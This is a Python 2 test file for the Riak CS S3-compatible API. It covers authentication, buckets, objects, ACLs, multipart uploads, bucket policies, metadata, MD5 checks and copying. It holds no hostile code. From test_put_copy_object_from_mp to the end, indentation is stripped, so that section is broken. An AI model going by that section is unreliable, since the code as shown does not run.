    @classmethod
    def setUpClass(cls):
        # Create test user so credentials don't have to be updated
        # for each test setup.
        # TODO: Once changes are in place so users can be deleted, use
        # userX@example.me for email addresses and clean up at the end of
        # the test run.
        cls.maxDiff = 10000000000
        cls.user1 = create_user(cls.host, cls.port, "user1", str(uuid.uuid4()) + "@example.me")
        cls.user2 = create_user(cls.host, cls.port, "user2", str(uuid.uuid4()) + "@example.me")
        cls.bucket_name = str(uuid.uuid4())
        cls.key_name = str(uuid.uuid4())
        # NOTE(review): Python 2 `file` builtin; the handle is never
        # closed and 1KB of random bytes is shared by all tests.
        cls.data = file("/dev/urandom").read(1024)

    def defaultAcl(self, user):
        """Expected ACL XML for an object/bucket owned by *user*."""
        return self.SimpleAcl % (user['id'], user['display_name'], user['id'], user['display_name'], 'FULL_CONTROL')

    def prAcl(self, user):
        """Expected ACL XML after applying the 'public-read' canned ACL."""
        return self.PublicReadAcl % (user['id'], user['display_name'], user['id'], user['display_name'], 'FULL_CONTROL')

    def setUp(self):
        # Each test talks to the service as user1 by default.
        self.conn = self.make_connection(self.user1)
class BasicTests(S3ApiVerificationTestBase):
    """Core S3 API smoke tests: authentication, bucket and object CRUD,
    and canned ACLs.

    NOTE(review): some tests appear to rely on in-class execution order
    (e.g. test_delete_bucket fetches the bucket created by earlier
    tests) -- confirm before reordering or parallelizing.
    """
    def test_auth(self):
        # Bogus credentials must be rejected by the service.
        bad_user = json.loads('{"email":"baduser@example.me","display_name":"baduser","name":"user1","key_id":"bad_key","key_secret":"BadSecret","id":"bad_canonical_id"}')
        conn = self.make_connection(bad_user)
        self.assertRaises(S3ResponseError, conn.get_canonical_user_id)

    def test_auth_weird_query_param(self):
        # A percent-encoded query parameter must not break request
        # signing: expect a clean 404 for a missing key, not a 403.
        bucket = self.conn.create_bucket(self.bucket_name)
        query_args = 'foo=bar%20baz'
        response = bucket.connection.make_request('GET', bucket.name, "notfound",
                                                  query_args=query_args)
        body = response.read()
        boto.log.debug(body)
        if response.status != 404:
            raise bucket.connection.provider.storage_response_error(
                response.status, response.reason, body)

    def test_create_bucket(self):
        self.conn.create_bucket(self.bucket_name)
        self.assertIn(self.bucket_name,
                      [b.name for b in self.conn.get_all_buckets()])

    def test_put_object(self):
        bucket = self.conn.create_bucket(self.bucket_name)
        k = Key(bucket)
        k.key = self.key_name
        k.set_contents_from_string(self.data)
        self.assertEqual(k.get_contents_as_string(), self.data)
        self.assertIn(self.key_name,
                      [k.key for k in bucket.get_all_keys()])

    def test_put_object_with_trailing_slash(self):
        # Folder-style keys (trailing '/') must round-trip as well.
        bucket = self.conn.create_bucket(self.bucket_name)
        key_name_with_slash = self.key_name + "/"
        k = Key(bucket)
        k.key = key_name_with_slash
        k.set_contents_from_string(self.data)
        self.assertEqual(k.get_contents_as_string(), self.data)
        self.assertIn(key_name_with_slash,
                      [k.key for k in bucket.get_all_keys()])

    def test_delete_object(self):
        bucket = self.conn.create_bucket(self.bucket_name)
        k = Key(bucket)
        k.key = self.key_name
        k.delete()
        self.assertNotIn(self.key_name,
                         [k.key for k in bucket.get_all_keys()])

    def test_delete_objects(self):
        # Multi-object delete, including a unicode key and a key with
        # spaces.  Per S3 semantics a nonexistent key is reported in
        # `deleted`, not in `errors`.
        bucket = self.conn.create_bucket(self.bucket_name)
        keys = ['0', '1', u'Unicodeあいうえお', '2', 'multiple spaces']
        keys.sort()
        for key in keys:
            k = Key(bucket)
            k.key = key
            k.set_contents_from_string(key)
        all_keys = [k.key for k in bucket.get_all_keys()]
        all_keys.sort()
        self.assertEqual(keys, all_keys)
        result = bucket.delete_keys(keys)
        self.assertEqual(keys, [k.key for k in result.deleted])
        self.assertEqual([], result.errors)
        result = bucket.delete_keys(['nosuchkeys'])
        self.assertEqual([], result.errors)
        self.assertEqual(['nosuchkeys'], [k.key for k in result.deleted])
        all_keys = [k.key for k in bucket.get_all_keys()]
        self.assertEqual([], all_keys)

    def test_delete_bucket(self):
        bucket = self.conn.get_bucket(self.bucket_name)
        bucket.delete()
        self.assertNotIn(self.bucket_name,
                         [b.name for b in self.conn.get_all_buckets()])

    def test_get_bucket_acl(self):
        bucket = self.conn.create_bucket(self.bucket_name)
        self.assertEqual(bucket.get_acl().to_xml(), self.defaultAcl(self.user1))

    def test_set_bucket_acl(self):
        bucket = self.conn.get_bucket(self.bucket_name)
        bucket.set_canned_acl('public-read')
        self.assertEqual(bucket.get_acl().to_xml(), self.prAcl(self.user1))

    def test_get_object_acl(self):
        bucket = self.conn.create_bucket(self.bucket_name)
        k = Key(bucket)
        k.key = self.key_name
        k.set_contents_from_string(self.data)
        self.assertEqual(k.get_contents_as_string(), self.data)
        self.assertEqual(k.get_acl().to_xml(), self.defaultAcl(self.user1))

    def test_set_object_acl(self):
        bucket = self.conn.create_bucket(self.bucket_name)
        k = Key(bucket)
        k.key = self.key_name
        k.set_canned_acl('public-read')
        self.assertEqual(k.get_acl().to_xml(), self.prAcl(self.user1))
class MultiPartUploadTests(S3ApiVerificationTestBase):
    """Multipart upload happy paths: content md5 round-trips, ACLs,
    storage class reporting and unicode key names."""
    def multipart_md5_helper(self, parts, key_suffix=u''):
        """Upload *parts* as a multipart object under a fresh uuid key
        and verify the stored content's md5 equals the md5 of the
        concatenated parts.  Returns (upload, result)."""
        key_name = unicode(str(uuid.uuid4())) + key_suffix
        stringio_parts = [StringIO(p) for p in parts]
        expected_md5 = md5.new(''.join(parts)).hexdigest()
        bucket = self.conn.create_bucket(self.bucket_name)
        upload, result = upload_multipart(bucket, key_name, stringio_parts)
        key = Key(bucket, key_name)
        actual_md5 = md5_from_key(key)
        self.assertEqual(expected_md5, actual_md5)
        self.assertEqual(key_name, result.key_name)
        return upload, result

    def test_small_strings_upload_1(self):
        parts = ['this is part one', 'part two is just a rewording',
                 'surprise that part three is pretty much the same',
                 'and the last part is number four']
        self.multipart_md5_helper(parts)

    def test_small_strings_upload_2(self):
        parts = ['just one lonely part']
        self.multipart_md5_helper(parts)

    def test_small_strings_upload_3(self):
        parts = [str(uuid.uuid4()) for _ in xrange(100)]
        self.multipart_md5_helper(parts)

    def test_small_strings_upload_4(self):
        parts = [str(uuid.uuid4()) for _ in xrange(20)]
        self.multipart_md5_helper(parts)

    def test_acl_is_set(self):
        parts = [str(uuid.uuid4()) for _ in xrange(5)]
        key_name = str(uuid.uuid4())
        stringio_parts = [StringIO(p) for p in parts]
        expected_md5 = md5.new(''.join(parts)).hexdigest()
        bucket = self.conn.create_bucket(self.bucket_name)
        # NOTE(review): upload_multipart returns an (upload, result)
        # tuple; it is bound but unused here, which is harmless.
        upload = upload_multipart(bucket, key_name, stringio_parts,
                                  policy='public-read')
        key = Key(bucket, key_name)
        actual_md5 = md5_from_key(key)
        self.assertEqual(expected_md5, actual_md5)
        self.assertEqual(key.get_acl().to_xml(), self.prAcl(self.user1))

    def test_standard_storage_class(self):
        # Test for bug reported in
        # https://github.com/basho/riak_cs/pull/575
        bucket = self.conn.create_bucket(self.bucket_name)
        key_name = 'test_standard_storage_class'
        _never_finished_upload = bucket.initiate_multipart_upload(key_name)
        uploads = list(bucket.list_multipart_uploads())
        for u in uploads:
            self.assertEqual(u.storage_class, 'STANDARD')
        # NOTE(review): tautological assertion; the real checks are the
        # listing call and the loop above.
        self.assertTrue(True)

    def test_upload_japanese_key(self):
        parts = ['this is part one', 'part two is just a rewording',
                 'surprise that part three is pretty much the same',
                 'and the last part is number four']
        self.multipart_md5_helper(parts, key_suffix=u'日本語サフィックス')

    def test_list_japanese_key(self):
        bucket = self.conn.create_bucket(self.bucket_name)
        key_name = u'test_日本語キーのリスト'
        _never_finished_upload = bucket.initiate_multipart_upload(key_name)
        uploads = list(bucket.list_multipart_uploads())
        for u in uploads:
            self.assertEqual(u.key_name, key_name)
def one_kb_string():
    "Return a 1KB string of all a's"
    return 'a' * 1024
def kb_gen_fn(num_kilobytes):
    """Return a zero-arg callable producing a fresh generator that
    yields a 1KB string *num_kilobytes* times."""
    payload = one_kb_string()
    def make_gen():
        return (payload for _ in range(num_kilobytes))
    return make_gen
def kb_file_gen(num_kilobytes):
    """Build a FileGenerator streaming num_kilobytes KB of 'a' bytes."""
    return FileGenerator(kb_gen_fn(num_kilobytes), num_kilobytes * 1024)
def mb_file_gen(num_megabytes):
    """Like kb_file_gen, but sized in megabytes."""
    kilobytes = num_megabytes * 1024
    return kb_file_gen(kilobytes)
def md5_from_file(file_object):
    """Hex md5 digest of a single file-like object's content."""
    return update_md5_from_file(md5.new(), file_object).hexdigest()
def md5_from_files(file_objects):
    """Hex md5 of several file-like objects' contents, concatenated.

    (Note the plural -- distinct from md5_from_file.)
    """
    digest = md5.new()
    for fobj in file_objects:
        update_md5_from_file(digest, fobj)
    return digest.hexdigest()
def update_md5_from_file(md5_object, file_object):
    """Feed *file_object*'s content into *md5_object* in 8196-byte
    chunks and return the (mutated) md5 object."""
    while True:
        chunk = file_object.read(8196)
        if not chunk:
            break
        md5_object.update(chunk)
    return md5_object
def remove_double_quotes(string):
    """Strip every double-quote character (used to unquote ETag values)."""
    return ''.join(ch for ch in string if ch != '"')
class FileGenTest(unittest.TestCase):
    """Sanity checks for the FileGenerator helper used by upload tests."""
    def test_read_twice(self):
        """ Read 2KB file and reset (seek to the head) and re-read 2KB """
        num_kb = 2
        f = kb_file_gen(num_kb)

        first1 = f.read(1024)
        self.assertEqual(1024, len(first1))
        first2 = f.read(1024)
        self.assertEqual(1024, len(first2))
        self.assertEqual(2048, f.pos)
        # At EOF further reads return '' and do not advance pos.
        self.assertEqual('', f.read(1))
        self.assertEqual('', f.read(1))
        self.assertEqual(2048, f.pos)

        f.seek(0)
        self.assertEqual(0, f.pos)
        second1 = f.read(1024)
        # Fix: originally re-asserted len(first1) here (copy-paste bug),
        # so the first chunk of the re-read was never checked.
        self.assertEqual(1024, len(second1))
        second2 = f.read(1024)
        self.assertEqual(1024, len(second2))
        self.assertEqual(2048, f.pos)
        self.assertEqual('', f.read(1))
        self.assertEqual('', f.read(1))
class LargerFileUploadTest(S3ApiVerificationTestBase):
    "Larger, regular key uploads"
    def upload_helper(self, num_kilobytes):
        """Upload num_kilobytes KB via a single PUT (with a Content-MD5
        header) and check the returned ETag matches the expected md5."""
        key_name = str(uuid.uuid4())
        bucket = self.conn.create_bucket(self.bucket_name)
        md5_expected = md5_from_file(kb_file_gen(num_kilobytes))
        file_obj = kb_file_gen(num_kilobytes)
        key = Key(bucket, key_name)
        key.set_contents_from_file(file_obj,
                                   md5=key.get_md5_from_hexdigest(md5_expected))
        # ETags come back wrapped in double quotes.
        self.assertEqual(md5_expected, remove_double_quotes(key.etag))

    def test_1kb(self):
        return self.upload_helper(1)

    def test_2kb(self):
        return self.upload_helper(2)

    def test_256kb(self):
        return self.upload_helper(256)

    def test_512kb(self):
        return self.upload_helper(512)

    def test_1mb(self):
        return self.upload_helper(1 * 1024)

    def test_4mb(self):
        return self.upload_helper(4 * 1024)

    def test_8mb(self):
        return self.upload_helper(8 * 1024)

    def test_16mb(self):
        return self.upload_helper(16 * 1024)

    def test_32mb(self):
        return self.upload_helper(32 * 1024)
class LargerMultipartFileUploadTest(S3ApiVerificationTestBase):
    """
    Larger, multipart file uploads - to pass this test,
    requires '{enforce_multipart_part_size, false},' entry at riak_cs's app.config
    """
    def upload_parts_helper(self, zipped_parts_and_md5s, expected_md5):
        """Upload (file-like part, per-part md5) pairs as a multipart
        object and verify the assembled content's md5."""
        key_name = str(uuid.uuid4())
        bucket = self.conn.create_bucket(self.bucket_name)
        upload = bucket.initiate_multipart_upload(key_name)
        key = Key(bucket, key_name)
        for idx, (part, md5_of_part) in enumerate(zipped_parts_and_md5s):
            # Part numbers are 1-based; each part carries its own md5.
            upload.upload_part_from_file(part, idx + 1,
                                         md5=key.get_md5_from_hexdigest(md5_of_part))
        upload.complete_upload()
        actual_md5 = md5_from_key(key)
        self.assertEqual(expected_md5, actual_md5)

    def from_mb_list(self, mb_list):
        """Drive upload_parts_helper with parts sized (in MB) by mb_list."""
        md5_list = [md5_from_file(mb_file_gen(m)) for m in mb_list]
        expected_md5 = md5_from_files([mb_file_gen(m) for m in mb_list])
        parts = [mb_file_gen(m) for m in mb_list]
        self.upload_parts_helper(zip(parts, md5_list), expected_md5)

    def test_upload_1(self):
        mb_list = [5, 6, 5, 7, 8, 9]
        self.from_mb_list(mb_list)

    def test_upload_2(self):
        mb_list = [10, 11, 5, 7, 9, 14, 12]
        self.from_mb_list(mb_list)

    def test_upload_3(self):
        mb_list = [15, 14, 13, 12, 11, 10]
        self.from_mb_list(mb_list)
class UnicodeNamedObjectTest(S3ApiVerificationTestBase):
    ''' test to check unicode object name works '''
    # Shared fixture key name with non-ASCII characters.
    utf8_key_name = u"utf8ファイル名.txt"
    # ^^^^^^^^^ filename in Japanese

    def test_unicode_object(self):
        # PUT then GET an object under a unicode key; it must round-trip
        # and appear in listings.
        bucket = self.conn.create_bucket(self.bucket_name)
        k = Key(bucket)
        k.key = UnicodeNamedObjectTest.utf8_key_name
        k.set_contents_from_string(self.data)
        self.assertEqual(k.get_contents_as_string(), self.data)
        self.assertIn(UnicodeNamedObjectTest.utf8_key_name,
                      [obj.key for obj in bucket.list()])

    def test_delete_object(self):
        # DELETE of a unicode key must remove it from listings.
        bucket = self.conn.create_bucket(self.bucket_name)
        k = Key(bucket)
        k.key = UnicodeNamedObjectTest.utf8_key_name
        k.delete()
        self.assertNotIn(UnicodeNamedObjectTest.utf8_key_name,
                         [obj.key for obj in bucket.list()])
class BucketPolicyTest(S3ApiVerificationTestBase):
    """Bucket policy tests: PUT/GET/DELETE of policies, validation of
    bad policy documents, and enforcement of IP / transport conditions.

    Fix: the negative tests (invalid IP, bad version, malformed JSON)
    used to pass silently when the server wrongly ACCEPTED the invalid
    policy; each now calls self.fail() if no S3ResponseError is raised.
    """
    def test_no_policy(self):
        # GET policy on a bucket without one must raise.
        bucket = self.conn.create_bucket(self.bucket_name)
        bucket.delete_policy()
        try: bucket.get_policy()
        except S3ResponseError: pass
        else: self.fail()

    def create_bucket_and_set_policy(self, policy_template):
        """Create the shared bucket, clear any previous policy, and
        install policy_template rendered with the bucket name."""
        bucket = self.conn.create_bucket(self.bucket_name)
        bucket.delete_policy()
        policy = policy_template % bucket.name
        bucket.set_policy(policy, headers={'content-type':'application/json'})
        return bucket

    def test_put_policy_invalid_ip(self):
        # "0" is not a valid CIDR; the server must reject the policy.
        policy_template = '''
{"Version":"2008-10-17","Statement":[{"Sid":"Stmtaaa","Effect":"Allow","Principal":"*","Action":["s3:GetObjectAcl","s3:GetObject"],"Resource":"arn:aws:s3:::%s/*","Condition":{"IpAddress":{"aws:SourceIp":"0"}}}]}
'''
        try:
            self.create_bucket_and_set_policy(policy_template)
            self.fail()
        except S3ResponseError as e:
            self.assertEqual(e.status, 400)
            self.assertEqual(e.reason, 'Bad Request')

    def test_put_policy(self):
        ### old version name
        policy_template = '''
{"Version":"2008-10-17","Statement":[{"Sid":"Stmtaaa","Effect":"Allow","Principal":"*","Action":["s3:GetObjectAcl","s3:GetObject"],"Resource":"arn:aws:s3:::%s/*","Condition":{"IpAddress":{"aws:SourceIp":"127.0.0.1/32"}}}]}
'''
        bucket = self.create_bucket_and_set_policy(policy_template)
        got_policy = bucket.get_policy()
        self.assertEqual(policy_template % bucket.name , got_policy)

    def test_put_policy_2(self):
        ### new version name, also regression of #911
        policy_template = '''
{"Version":"2012-10-17","Statement":[{"Sid":"Stmtaaa","Effect":"Allow","Principal":"*","Action":["s3:GetObjectAcl","s3:GetObject"],"Resource":"arn:aws:s3:::%s/*","Condition":{"IpAddress":{"aws:SourceIp":"127.0.0.1/32"}}}]}
'''
        bucket = self.create_bucket_and_set_policy(policy_template)
        got_policy = bucket.get_policy()
        self.assertEqual(policy_template % bucket.name, got_policy)

    def test_put_policy_3(self):
        # Unknown "Version" value must be rejected.
        policy_template = '''
{"Version":"somebadversion","Statement":[{"Sid":"Stmtaaa","Effect":"Allow","Principal":"*","Action":["s3:GetObjectAcl","s3:GetObject"],"Resource":"arn:aws:s3:::%s/*","Condition":{"IpAddress":{"aws:SourceIp":"127.0.0.1/32"}}}]}
'''
        try:
            self.create_bucket_and_set_policy(policy_template)
            self.fail()
        except S3ResponseError as e:
            self.assertEqual(e.status, 400)
            self.assertEqual(e.reason, 'Bad Request')

    def test_ip_addr_policy(self):
        # Deny GET from our own source address, then flip to Allow and
        # verify access returns.  Riak CS reports the deny as 404.
        policy_template = '''
{"Version":"2008-10-17","Statement":[{"Sid":"Stmtaaa","Effect":"Deny","Principal":"*","Action":["s3:GetObject"],"Resource":"arn:aws:s3:::%s/*","Condition":{"IpAddress":{"aws:SourceIp":"%s"}}}]}
''' % ('%s', self.host)
        bucket = self.create_bucket_and_set_policy(policy_template)

        key_name = str(uuid.uuid4())
        key = Key(bucket, key_name)
        key.set_contents_from_string(self.data)
        bucket.list()
        try:
            key.get_contents_as_string()
            self.fail()
        except S3ResponseError as e:
            self.assertEqual(e.status, 404)
            self.assertEqual(e.reason, 'Object Not Found')

        policy = '''
{"Version":"2008-10-17","Statement":[{"Sid":"Stmtaaa","Effect":"Allow","Principal":"*","Action":["s3:GetObject"],"Resource":"arn:aws:s3:::%s/*","Condition":{"IpAddress":{"aws:SourceIp":"%s"}}}]}
''' % (bucket.name, self.host)
        self.assertTrue(bucket.set_policy(policy, headers={'content-type':'application/json'}))
        key.get_contents_as_string() ## throws nothing

    def test_invalid_transport_addr_policy(self):
        # `wat` makes the document malformed JSON; must be rejected.
        bucket = self.conn.create_bucket(self.bucket_name)
        key_name = str(uuid.uuid4())
        key = Key(bucket, key_name)
        key.set_contents_from_string(self.data)
        ## anyone may GET this object
        policy = '''
{"Version":"2008-10-17","Statement":[{"Sid":"Stmtaaa0","Effect":"Allow","Principal":"*","Action":["s3:GetObject"],"Resource":"arn:aws:s3:::%s/*","Condition":{"Bool":{"aws:SecureTransport":wat}}}]}
''' % bucket.name
        try:
            bucket.set_policy(policy, headers={'content-type':'application/json'})
            self.fail()
        except S3ResponseError as e:
            self.assertEqual(e.status, 400)
            self.assertEqual(e.reason, 'Bad Request')

    def test_transport_addr_policy(self):
        bucket = self.conn.create_bucket(self.bucket_name)
        key_name = str(uuid.uuid4())
        key = Key(bucket, key_name)
        key.set_contents_from_string(self.data)

        ## anyone may GET this object
        policy = '''
{"Version":"2008-10-17","Statement":[{"Sid":"Stmtaaa0","Effect":"Allow","Principal":"*","Action":["s3:GetObject"],"Resource":"arn:aws:s3:::%s/*","Condition":{"Bool":{"aws:SecureTransport":false}}}]}
''' % bucket.name
        self.assertTrue(bucket.set_policy(policy, headers={'content-type':'application/json'}))
        key.get_contents_as_string()

        ## policy accepts anyone who comes with http
        conn = httplib.HTTPConnection(self.host, self.port)
        headers = { "Host" : "%s.s3.amazonaws.com" % bucket.name }
        conn.request('GET', ("/%s" % key_name) , None, headers)
        response = conn.getresponse()
        self.assertEqual(response.status, 200)
        self.assertEqual(response.read(), key.get_contents_as_string())

        ## anyone without https may not do any operation
        policy = '''
{"Version":"2008-10-17","Statement":[{"Sid":"Stmtaaa0","Effect":"Deny","Principal":"*","Action":"*","Resource":"arn:aws:s3:::%s/*","Condition":{"Bool":{"aws:SecureTransport":false}}}]}
''' % bucket.name
        self.assertTrue(bucket.set_policy(policy, headers={'content-type':'application/json'}))
        ## policy accepts anyone who comes with http
        conn = httplib.HTTPConnection(self.host, self.port)
        headers = { "Host" : "%s.s3.amazonaws.com" % bucket.name }
        conn.request('GET', ("/%s" % key_name) , None, headers)
        response = conn.getresponse()
        self.assertEqual(response.status, 403)
        self.assertEqual(response.reason, 'Forbidden')
class MultipartUploadTestsUnderPolicy(S3ApiVerificationTestBase):
    """Multipart uploads with a bucket policy that first allows, then
    denies, s3:PutObject over plain HTTP."""
    def test_small_strings_upload_1(self):
        bucket = self.conn.create_bucket(self.bucket_name)
        parts = ['this is part one', 'part two is just a rewording',
                 'surprise that part three is pretty much the same',
                 'and the last part is number four']
        stringio_parts = [StringIO(p) for p in parts]
        expected_md5 = md5.new(''.join(parts)).hexdigest()
        key_name = str(uuid.uuid4())
        key = Key(bucket, key_name)
        ## anyone may PUT this object
        policy = '''
{"Version":"2008-10-17","Statement":[{"Sid":"Stmtaaa0","Effect":"Allow","Principal":"*","Action":["s3:PutObject"],"Resource":"arn:aws:s3:::%s/*","Condition":{"Bool":{"aws:SecureTransport":false}}}]}
''' % bucket.name
        self.assertTrue(bucket.set_policy(policy, headers={'content-type':'application/json'}))
        # NOTE(review): upload_multipart returns (upload, result); the
        # tuple is bound but unused here.
        upload = upload_multipart(bucket, key_name, stringio_parts)
        actual_md5 = md5_from_key(key)
        self.assertEqual(expected_md5, actual_md5)
        ## anyone without https may not do any operation
        policy = '''
{"Version":"2008-10-17","Statement":[{"Sid":"Stmtaaa0","Effect":"Deny","Principal":"*","Action":["s3:PutObject"],"Resource":"arn:aws:s3:::%s/*","Condition":{"Bool":{"aws:SecureTransport":false}}}]}
''' % bucket.name
        self.assertTrue(bucket.set_policy(policy, headers={'content-type':'application/json'}))
        # With the deny in place the same upload must be rejected.
        try:
            upload = upload_multipart(bucket, key_name, stringio_parts)
            self.fail()
        except S3ResponseError as e:
            self.assertEqual(e.status, 403)
            self.assertEqual(e.reason, 'Forbidden')
class ObjectMetadataTest(S3ApiVerificationTestBase):
    "Test object metadata, e.g. Content-Encoding, x-amz-meta-*, for PUT/GET"
    # Metadata written on the initial PUT (mix of standard HTTP headers
    # and user x-amz-meta-* entries).
    metadata = {
        "Content-Disposition": 'attachment; filename="metaname.txt"',
        "Content-Encoding": 'identity',
        "Cache-Control": "max-age=3600",
        "Expires": "Tue, 19 Jan 2038 03:14:07 GMT",
        "mtime": "1364742057",
        "UID": "0",
        "with-hypen": "1",
        "space-in-value": "abc xyz"}
    # Replacement metadata applied via a self-copy (see change_metadata);
    # entries absent here must disappear from the stored object.
    updated_metadata = {
        "Content-Disposition": 'attachment; filename="newname.txt"',
        "Cache-Control": "private",
        "Expires": "Tue, 19 Jan 2038 03:14:07 GMT",
        "mtime": "2222222222",
        "uid": "0",
        "space-in-value": "ABC XYZ",
        "new-entry": "NEW"}

    def test_normal_object_metadata(self):
        # Round-trip metadata through a regular PUT, then replace it.
        key_name = str(uuid.uuid4())
        bucket = self.conn.create_bucket(self.bucket_name)
        key = Key(bucket, key_name)
        for k,v in self.metadata.items():
            key.set_metadata(k, v)
        key.set_contents_from_string("test_normal_object_metadata")
        self.assert_metadata(bucket, key_name)
        self.change_metadata(bucket, key_name)
        self.assert_updated_metadata(bucket, key_name)

    def test_mp_object_metadata(self):
        # Same round-trip, but through a multipart upload.
        key_name = str(uuid.uuid4())
        bucket = self.conn.create_bucket(self.bucket_name)
        upload = upload_multipart(bucket, key_name, [StringIO("part1")],
                                  metadata=self.metadata)
        self.assert_metadata(bucket, key_name)
        self.change_metadata(bucket, key_name)
        self.assert_updated_metadata(bucket, key_name)

    def assert_metadata(self, bucket, key_name):
        """Verify the stored object carries exactly `self.metadata`."""
        key = Key(bucket, key_name)
        key.get_contents_as_string()

        self.assertEqual(key.content_disposition,
                         'attachment; filename="metaname.txt"')
        self.assertEqual(key.content_encoding, "identity")
        self.assertEqual(key.cache_control, "max-age=3600")
        # TODO: Expires header can be accessed by boto?
        # self.assertEqual(key.expires, "Tue, 19 Jan 2038 03:14:07 GMT")
        self.assertEqual(key.get_metadata("mtime"), "1364742057")
        self.assertEqual(key.get_metadata("uid"), "0")
        self.assertEqual(key.get_metadata("with-hypen"), "1")
        self.assertEqual(key.get_metadata("space-in-value"), "abc xyz")
        # x-amz-meta-* headers should be normalized to lowercase
        self.assertEqual(key.get_metadata("Mtime"), None)
        self.assertEqual(key.get_metadata("MTIME"), None)
        self.assertEqual(key.get_metadata("Uid"), None)
        self.assertEqual(key.get_metadata("UID"), None)
        self.assertEqual(key.get_metadata("With-Hypen"), None)
        self.assertEqual(key.get_metadata("Space-In-Value"), None)

    def change_metadata(self, bucket, key_name):
        """Replace the object's metadata via an in-place self-copy."""
        key = Key(bucket, key_name)
        key.copy(bucket.name, key_name, self.updated_metadata)

    def assert_updated_metadata(self, bucket, key_name):
        """Verify the self-copy REPLACED (not merged) the metadata."""
        key = Key(bucket, key_name)
        key.get_contents_as_string()

        # unchanged
        self.assertEqual(key.get_metadata("uid"), "0")
        # updated
        self.assertEqual(key.content_disposition,
                         'attachment; filename="newname.txt"')
        self.assertEqual(key.cache_control, "private")
        self.assertEqual(key.get_metadata("mtime"), "2222222222")
        self.assertEqual(key.get_metadata("space-in-value"), "ABC XYZ")
        # removed
        self.assertEqual(key.content_encoding, None)
        self.assertEqual(key.get_metadata("with-hypen"), None)
        # inserted
        self.assertEqual(key.get_metadata("new-entry"), "NEW")
        # TODO: Expires header can be accessed by boto?
        # self.assertEqual(key.expires, "Tue, 19 Jan 2038 03:14:07 GMT")
class ContentMd5Test(S3ApiVerificationTestBase):
    """Content-MD5 header validation on PUT."""
    def test_catches_bad_md5(self):
        '''Make sure Riak CS catches a bad content-md5 header'''
        key_name = str(uuid.uuid4())
        bucket = self.conn.create_bucket(self.bucket_name)
        key = Key(bucket, key_name)
        # md5 computed over different bytes than the upload body.
        s = StringIO('not the real content')
        x = compute_md5(s)
        with self.assertRaises(S3ResponseError):
            key.set_contents_from_string('this is different from the md5 we calculated', md5=x)

    def test_bad_md5_leaves_old_object_alone(self):
        '''Github #705 Regression test:
        Make sure that overwriting an object using a bad md5
        simply leaves the old version in place.'''
        key_name = str(uuid.uuid4())
        bucket = self.conn.create_bucket(self.bucket_name)
        value = 'good value'
        good_key = Key(bucket, key_name)
        good_key.set_contents_from_string(value)
        bad_key = Key(bucket, key_name)
        s = StringIO('not the real content')
        x = compute_md5(s)
        # Deliberate best-effort: the rejected overwrite is expected to
        # raise; only the final content check matters.
        try:
            bad_key.set_contents_from_string('this is different from the md5 we calculated', md5=x)
        except S3ResponseError:
            pass
        self.assertEqual(good_key.get_contents_as_string(), value)
class SimpleCopyTest(S3ApiVerificationTestBase):
    def create_test_object(self):
        """Write self.data under self.key_name in the shared bucket,
        verify the round-trip, and return the boto Key."""
        bucket = self.conn.create_bucket(self.bucket_name)
        k = Key(bucket)
        k.key = self.key_name
        k.set_contents_from_string(self.data)
        self.assertEqual(k.get_contents_as_string(), self.data)
        self.assertIn(self.key_name,
                      [k.key for k in bucket.get_all_keys()])
        return k
    def test_put_copy_object(self):
        # Server-side copy of a regular key into a fresh bucket.
        k = self.create_test_object()
        target_bucket_name = str(uuid.uuid4())
        target_key_name = str(uuid.uuid4())
        target_bucket = self.conn.create_bucket(target_bucket_name)
        target_bucket.copy_key(target_key_name, self.bucket_name, self.key_name)
        target_key = Key(target_bucket)
        target_key.key = target_key_name
        self.assertEqual(target_key.get_contents_as_string(), self.data)
        self.assertIn(target_key_name,
                      [k.key for k in target_bucket.get_all_keys()])
def test_put_copy_object_from_mp(self):
bucket = self.conn.create_bucket(self.bucket_name)
(upload, result) = upload_multipart(bucket, self.key_name, [StringIO(self.data)])
target_bucket_name = str(uuid.uuid4())
target_key_name = str(uuid.uuid4())
target_bucket = self.conn.create_bucket(target_bucket_name)
target_bucket.copy_key(target_key_name, self.bucket_name, self.key_name)
target_key = Key(target_bucket)
target_key.key = target_key_name
self.assertEqual(target_key.get_contents_as_string(), self.data)
self.assertIn(target_key_name,
[k.key for k in target_bucket.get_all_keys()])
def test_upload_part_from_non_mp(self):
k = self.create_test_object()
target_bucket_name = str(uuid.uuid4())
target_key_name = str(uuid.uuid4())
target_bucket = self.conn.create_bucket(target_bucket_name)
start_offset=0
end_offset=9
target_bucket = self.conn.create_bucket(target_bucket_name)
upload = target_bucket.initiate_multipart_upload(target_key_name)
upload.copy_part_from_key(self.bucket_name, self.key_name, part_num=1,
start=start_offset, end=end_offset)
upload.complete_upload()
print([k.key for k in target_bucket.get_all_keys()])
target_key = Key(target_bucket)
target_key.key = target_key_name
self.assertEqual(self.data[start_offset:(end_offset+1)],
target_key.get_contents_as_string())
def test_upload_part_from_mp(self):
bucket = self.conn.create_bucket(self.bucket_name)
key_name = str(uuid.uuid4())
(upload, result) = upload_multipart(bucket, key_name, [StringIO(self.data)])
target_bucket_name = str(uuid.uuid4())
target_bucket = self.conn.create_bucket(target_bucket_name)
start_offset=0
end_offset=9
upload2 = target_bucket.initiate_multipart_upload(key_name)
upload2.copy_part_from_key(self.bucket_name, self.key_name, part_num=1,
start=start_offset, end=end_offset)
upload2.complete_upload()
target_key = Key(target_bucket, key_name)
self.assertEqual(self.data[start_offset:(end_offset+1)],
target_key.get_contents_as_string())
def test_put_copy_from_non_existing_key_404(self):
bucket = self.conn.create_bucket(self.bucket_name)
target_bucket_name = str(uuid.uuid4())
target_key_name = str(uuid.uuid4())
target_bucket = self.conn.create_bucket(target_bucket_name)
try:
target_bucket.copy_key(target_key_name, self.bucket_name, 'not_existing')
self.fail()
except S3ResponseError as e:
print e
self.assertEqual(e.status, 404)
self.assertEqual(e.reason, 'Object Not Found')
if __name__ == "__main__":
    # Restored indentation: the call must be inside the guard, otherwise
    # the file does not parse. Run this test module directly, verbosely.
    unittest.main(verbosity=2)
| {
"content_hash": "72cd11b5c652fa19653740b32cab507a",
"timestamp": "",
"source": "github",
"line_count": 862,
"max_line_length": 226,
"avg_line_length": 40.98259860788863,
"alnum_prop": 0.5997678829224106,
"repo_name": "yangchengjian/riak_cs",
"id": "5b43194c043cb250900718f58877f39f626af41d",
"size": "36239",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "client_tests/python/boto_tests/boto_test.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Clojure",
"bytes": "14579"
},
{
"name": "Erlang",
"bytes": "1916866"
},
{
